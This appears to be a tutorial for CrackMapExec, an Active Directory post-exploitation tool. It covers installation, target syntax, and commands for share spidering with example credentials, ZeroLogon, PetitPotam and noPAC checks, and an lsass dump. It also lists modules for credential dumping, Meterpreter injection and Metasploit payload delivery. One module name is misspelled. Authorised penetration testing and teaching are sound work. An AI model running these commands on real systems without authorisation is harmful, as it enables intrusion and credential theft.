CrackMapExec (also known as CME) is a post-exploitation program that assists in automating the security assessment of large Active Directory infrastructures.
CME was designed with stealth in mind, exploiting built-in Active Directory functionality to achieve its functionality and evading most endpoint protection/IDS/IPS technologies.
How to Install CrackMapExec
If you are using Kali you can install it from Kali repos but I recommend you install it from git source.
apt install crackmapexec
In this article I will install it on a Linux machine but if you need you can use it on Windows or using docker.
First, let’s install some dependencies
apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
Configure Databases
Configure new Certificate
CME Configuration folder
┌──(rfs㉿local-c2)-[~]
└─$ cd ~/.cme
Change CrackMapExec certificate
┌──(rfs㉿local-c2)-[~]
└─$ vi ~/.cme/cme.conf
┌──(rfs㉿local-c2)-[~]
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
Target Definition
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
CME Supported Protocols
SMB
MSSQL
LDAP
SSH
RDP
WINRM
Samba Protocol
We will start scanning a network as an example and then a specific host on the network
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.91
Search Text Files
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txt
CME SMB Modules
Vulnerabilities
SMB Module | Description |
---|---|
ZeroLogon | Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472 |
Petitpotam | Module to check if the DC is vulnerable to PetitPotam, credit to @topotam |
ms17-010 | MS17-010, /!\ not tested oustide home lab |
dfscoerce | Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam |
nopac | Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user |
shadowcoerce | Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam |
Credentials
Module | Description |
---|---|
gpp_autologin | Searches the domain controller for registry.xml to find autologon information and returns the username and password. |
gpp_password | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. |
handlekatz | Get lsass dump using handlekatz64 and parse the result with pypykatz |
hash_spider | Dump lsass recursively from a given hash using BH to find local admins |
keepass_discover | Search for KeePass-related files and process. |
keepass_trigger | Set up a malicious KeePass trigger to export the database in cleartext. |
lsassy | Dump lsass and parse the result remotely with lsassy |
masky | Remotely dump domain user credentials via an ADCS and a KDC |
teams_localdb | Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process |
wdigest | Creates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1 |
wireless | Get key of all wireless interfaces |
Scan for Samba vulnerabilities with CME
ZeroLogon
crackmapexec smb <ip> -u '' -p '' -M zerologo
PetitPotam
crackmapexec smb <ip> -u '' -p '' -M petitpotam
noPAC
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac
Nanodump
crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump
[*] nanodump module options:
TMP_DIR Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
MSSQL Protocol
CrackMapExec Modules to attack MsSQL Service.
MsSQL Modules
Module | Description |
---|---|
empire_exec | Uses Empire’s RESTful API to generate a launcher for the specified listener and executes it |
met_inject | Downloads the Meterpreter stager and injects it into memory |
mssql_priv | Enumerate and exploit MSSQL privileges |
nanodump | Get lsass dump using nanodump and parse the result with pypykatz |
test_connection | Pings a host |
web_delivery | Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module |